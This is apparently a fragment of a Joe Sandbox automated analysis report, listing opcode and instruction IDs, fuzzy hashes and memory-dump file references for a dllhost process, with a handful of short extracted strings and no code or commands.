                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae6c0acfc7ae883281893685fe221877898eeb64c32645bd80fbf4511d1f7b09
                                      • Instruction ID: b69866d41b5d9eb2df1af8a672730df696d6d893e2ff066fb158a3b5da781352
                                      • Opcode Fuzzy Hash: ae6c0acfc7ae883281893685fe221877898eeb64c32645bd80fbf4511d1f7b09
                                      • Instruction Fuzzy Hash: 2141A631A096598FDF45EF68CCA59E97FE1EF5A310B0441BBD109DB293DA2DA841C740
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b88c07979410c4a7246dfbb955d0108acac2930488c3622c393ca9df7049d6b
                                      • Instruction ID: 3513dcf5c3f7caec3751742f442d75a89aa34b149322bb842f7450d927412475
                                      • Opcode Fuzzy Hash: 3b88c07979410c4a7246dfbb955d0108acac2930488c3622c393ca9df7049d6b
                                      • Instruction Fuzzy Hash: 39314821B0DA651FF764BAB8A8BA1FA7BC1DF96326F1444BED54EC31D3CC1CA8415284
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f3e3c5d5c49bf0c1affa0293ac66eb16d4d06333661c627bbdbc32a36629d0f
                                      • Instruction ID: 89035573b6f39f708fa08a8bb0b92f8b3bd9fb3462355b64c7c2d1efad758b29
                                      • Opcode Fuzzy Hash: 2f3e3c5d5c49bf0c1affa0293ac66eb16d4d06333661c627bbdbc32a36629d0f
                                      • Instruction Fuzzy Hash: 27310821B0D9650FE798AB6888AA6B97BD2EF9A311F1440BED54EC32D3DD18AC419344
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e41a441bfe718bf8df4810dac61ab8db5d951afc338e6a8c8bd3209e0201c02a
                                      • Instruction ID: 5f4c2b3eeb7d5486e8fee7de3398960f11598a616211545ad238388af1ea9e0b
                                      • Opcode Fuzzy Hash: e41a441bfe718bf8df4810dac61ab8db5d951afc338e6a8c8bd3209e0201c02a
                                      • Instruction Fuzzy Hash: 6E313A75B0DA598FE7119FA88CA12ED7FA0EF43325F1480B6D248CB1C3D93CA44697A1
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ff748e917cd453df4fdde5923a6312c1456426e0b8128b2e2605db2ef225ca9
                                      • Instruction ID: 0132e0443ebb35a2904536eae234fdf6763030710f04aa4918fef60d3e9036ad
                                      • Opcode Fuzzy Hash: 7ff748e917cd453df4fdde5923a6312c1456426e0b8128b2e2605db2ef225ca9
                                      • Instruction Fuzzy Hash: 2D212F30E185698FDB65DF04C8A47E9B7E1FB58314F1085EAC50EE3291CA79AE85CB40
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab68ed956653d2722945e2deaaaffb8d80bbb2c3743cd6bac7619b2244a100c3
                                      • Instruction ID: a05097894a35d74d2ef0de38baec3a3f454657406283e25b8db1f2cc4380ff83
                                      • Opcode Fuzzy Hash: ab68ed956653d2722945e2deaaaffb8d80bbb2c3743cd6bac7619b2244a100c3
                                      • Instruction Fuzzy Hash: 6F11A375B0DA598FE701DF688CA11ED7FA0EF53311F1480B6C244D7182D93CA54697A0
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bccbca5b6a8d24362356f4cff4162a8321bf1519d9c653cc19cbedad45f95ca
                                      • Instruction ID: e315a2fc8b54b6efee7c769c38e673eb003daa2957f3fbca91037f8872835c68
                                      • Opcode Fuzzy Hash: 3bccbca5b6a8d24362356f4cff4162a8321bf1519d9c653cc19cbedad45f95ca
                                      • Instruction Fuzzy Hash: 7F11A175A0EA998FE702DF688CA11ED7FB0EF53311F1480B6C144DB192D93CA64597A0
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f3e525a73533dad76fce7fed9db3b0746ac62aa26321f8b09999656ea351708
                                      • Instruction ID: edc72585410a37197f0b7c87696c0ab7dfe2772f581542fd53d89dba80b0eab1
                                      • Opcode Fuzzy Hash: 3f3e525a73533dad76fce7fed9db3b0746ac62aa26321f8b09999656ea351708
                                      • Instruction Fuzzy Hash: 5501CC75A0E6898FEB02DF688CA00ED7FB0EF43310F1480F6C144DB192E938AA4597A0
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8167646523b88015d60b2965b5c5cef0992c7fbae94de9fbc5bc4e88dc7bd960
                                      • Instruction ID: 6384d8a2d336c9391cedef3dfa91f7428ee8066c97781bdf43a1e6713bc9fe53
                                      • Opcode Fuzzy Hash: 8167646523b88015d60b2965b5c5cef0992c7fbae94de9fbc5bc4e88dc7bd960
                                      • Instruction Fuzzy Hash: 30E09222F0C92A4BF7E8EA5888B62F92682DFC5715F044272D10DD3286DD1D6E428681
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.2543340919.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ffd34670000_dllhost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845